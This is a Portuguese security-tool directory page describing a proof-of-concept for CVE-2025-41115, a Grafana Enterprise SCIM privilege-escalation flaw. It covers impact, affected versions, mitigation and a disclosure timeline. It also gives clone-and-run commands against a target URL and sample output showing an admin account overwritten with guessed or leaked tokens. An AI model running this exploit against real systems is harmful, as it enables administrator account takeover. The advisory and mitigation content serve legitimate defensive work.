Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-41115 — CVE-2025-41115 | Kitploit
Ferramentas/GitHubGitHub/rockmelodies/blackash-cve-2025-41115
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança na NuvemGerenciamento de Identidade e Acesso (IAM)Autenticação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
rockmelodies/blackash-cve-2025-41115

Blackash-CVE-2025-41115

CVE-2025-41115

Ver Repositório
115há 9 mesesAinda não revisado

🔐 CVE-2025-41115: Escalação de Privilégios Crítica no SCIM do Grafana

218fa54275e0e31c37b4e5091d9112ba_M

Vulnerabilidade Crítica de Escalação de Privilégios no SCIM do Grafana Enterprise


🌟 Resumo

CVE-2025-41115 é uma vulnerabilidade Crítica (CVSS 10.0) no Grafana Enterprise que afeta seu recurso de provisionamento de usuários via SCIM.

Quando o provisionamento SCIM está habilitado e user_sync_enabled = true, um cliente SCIM malicioso pode enviar um externalId numérico, que o Grafana mapeia erroneamente para um ID de usuário interno — permitindo que um atacante personifique ou sobrescreva contas existentes, incluindo administradores. ⚠️ O Grafana OSS NÃO é afetado.


🚨 Impacto

  • 🔓 Assunção de conta (incluindo contas de administrador)
  • 🚀 Escalação de privilégios com direitos totais de administrador
  • 🗄️ Acesso a dashboards / dados / configurações de organizações
  • 🌐 Explorável pela rede com baixos requisitos
  • 🛑 Alto risco para configurações multi-tenant ou SSO empresarial

Condições necessárias para a exploração:

  1. enableSCIM = true
  2. [auth.scim] user_sync_enabled = true

🧩 Versões Afetadas

VersãoStatus
12.0.0 → 12.2.1❌ Vulnerável
12.3.0✅ Corrigida
12.2.1 (build corrigido)✅ Corrigida
12.1.3

💡 Os serviços Grafana gerenciados (AWS/Azure/Grafana Cloud) foram corrigidos pelos fornecedores.


Como usar em 3 segundos:

1. Baixar

root@kitploit:~
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git

ou apenas copie e cole o script acima em um arquivo

2. Tornar executável (opcional)

root@kitploit:~
chmod +x CVE-2025-41115.py

3. Execute

root@kitploit:~
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com

Quando o exploit realmente funciona (ou seja, o alvo está vulnerável e o token é válido), você verá uma saída exatamente assim: texto

root@kitploit:~
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
  "schemas": [
    "urn:ietf:params:scim:schemas:core:2.0:User"
  ],
  "id": "1",                     ←←← THIS IS THE KEY LINE (UID 1 overwritten)
  "externalId": "1",
  "meta": { ... },
  "userName": "[email protected]",
  "name": {
    "formatted": "Pwned User"
  },
  "emails": [
    {
      "value": "[email protected]",
      "primary": true
    }
  ],
  "active": true
}

🔧 Etapas de Mitigação

🥇 1. Atualize Imediatamente

Atualize para 12.3.0 ou uma das versões de manutenção corrigidas.

🛠️ 2. Verifique sua configuração SCIM

Se você não estiver usando o provisionamento SCIM, certifique-se de ter:

root@kitploit:~
enableSCIM = false

ou

root@kitploit:~
[auth.scim]
user_sync_enabled = false

📜 3. Audite os logs

Procure por:

  • Novos usuários inesperados
  • Uso de externalId numérico
  • Alterações de privilégios

🔐 4. Limites de confiança

Garanta que apenas provedores de identidade confiáveis tenham permissão para se comunicar com seu endpoint SCIM.

👀 5. Monitore por exploração

Fique atento a logins suspeitos, eventos de criação de usuários ou assunção de contas de administrador.


📅 Cronologia

  • 📌 2025-11-04 — Problema descoberto internamente
  • 📌 2025-11-04 — Incidente declarado
  • 📌 2025-11-05 — Fornecedores de nuvem notificados em particular e corrigidos
  • 📌 2025-11-19 — Divulgação pública e correção oficial lançadas

📝 Notas Adicionais

  • 🎯 A falha se deve especificamente ao Grafana mapear externalId numérico → uid interno.
  • 🟢 A exploração exige SCIM com sincronização de usuários, portanto, muitas implantações são seguras por padrão — mas você deve confirmar.
  • ⚡ Nenhuma exploração confirmada no mundo real no momento da divulgação, mas a pontuação CVSS 10 significa que é extremamente perigoso.

aviso legal!!!

Este PoC destina-se apenas a testes de segurança autorizados e uso educacional em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado é ilegal e pode resultar em processo criminal. O autor e o distribuidor não assumem responsabilidade por uso indevido. Corrija imediatamente (≥12.0.6 / 12.3.0+).

Baixar ferramenta
✅ Corrigida
12.0.6✅ Corrigida